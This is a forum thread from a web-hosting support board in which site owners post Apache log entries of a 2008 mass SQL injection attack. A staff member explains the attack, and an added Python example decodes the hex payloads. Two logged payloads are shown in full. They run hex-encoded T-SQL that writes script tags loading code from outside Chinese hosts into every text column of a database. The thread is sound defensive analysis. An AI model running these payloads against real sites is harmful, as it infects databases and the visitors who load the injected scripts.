Full Version: Attacks On My Site/server
TotalChoice Hosting Family Forums > TotalChoice Hosting General Support > Security Discussions
carbonize
I was going through my error logs and noticed some alerts so I downloaded my raw log. I found the following entries (there were more but I'll only post one full and one truncated). So I'm guessing there is an exploit in an old version of either PHP or Apache but can anyone shed any light on it? I have blocked the 2 main IPs using htaccess for now.

ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343<snip>C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
TCH-Dick
This is a common form of an SQL injection and is not really related to Apache or PHP. This can be accomplished on any scripting language if the script is not validating user input. This particular attack is attempting to insert code that allows an external script to load in a frame on the site, which is then used for things like redirecting the visitor or infecting their machine.

If you convert everything in parentheses for CAST from hex to ASCII, you can see the SQL query used. This will give you some idea of what they were attempting and if it affected your database.

We will take this information and add the appropriate rules to our servers to help prevent these attacks.
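
Decoding the CAST payload the way TCH-Dick describes, as an added Python example (not code from the thread): it takes the request target from an Apache access-log line, URL-decodes it, finds the CAST(0x... AS CHAR(n)) blob and turns the hex back into the SQL it carries, so you can read what the request tried to run. The sample log line is constructed, with a short statement hex-encoded the same way as the real entries and example.invalid as a placeholder host; the real payload casts to CHAR, so it decodes as single-byte text, while the NVARCHAR variant of the same attack is UTF-16LE and is handled too.

```python
import re
from urllib.parse import unquote

# Matches the "CAST(0x<hex> AS CHAR(n))" / "AS NVARCHAR(n)" shape seen in the
# logged requests; the hex blob is the T-SQL that EXEC(@S) would run.
CAST_RE = re.compile(
    r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\s*\(\d+\)\)", re.IGNORECASE
)


def request_path(log_line):
    """Return the request target from an Apache combined-format log line."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/', log_line)
    return m.group(1) if m else ""


def decode_cast_payloads(log_line):
    """Decode every hex CAST payload in a log line back to readable SQL.

    CHAR/VARCHAR payloads are single-byte text; NCHAR/NVARCHAR payloads are
    UTF-16LE, which is why a naive hex-to-ASCII dump of those shows a NUL
    after every character.
    """
    target = unquote(request_path(log_line))  # %20 -> space, etc.
    decoded = []
    for hex_blob, cast_type in CAST_RE.findall(target):
        raw = bytes.fromhex(hex_blob)
        codec = "utf-16-le" if cast_type.upper().startswith("N") else "latin-1"
        decoded.append(raw.decode(codec, errors="replace"))
    return decoded


# Constructed sample: a short statement hex-encoded the same way as the real
# entries (the real one walks sysobjects/syscolumns and appends a <script> tag).
SAMPLE_SQL = "update [T] set [C]=[C]+'<script src=\"http://example.invalid/w.js\"></script>'"
SAMPLE_LINE = (
    'host - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?;DECLARE%20@S%20CHAR(4000);'
    "SET%20@S=CAST(0x" + SAMPLE_SQL.encode("latin-1").hex().upper()
    + '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9659 "-" "Mozilla/4.0"'
)

if __name__ == "__main__":
    for sql in decode_cast_payloads(SAMPLE_LINE):
        print(sql)
```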

carbonize
Your servers blocked the attack anyway because the GET was too long. This is how I discovered them because they were in the error log.
atmospheresinking
I'm getting these as well.

http://atmospheresinking.com/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);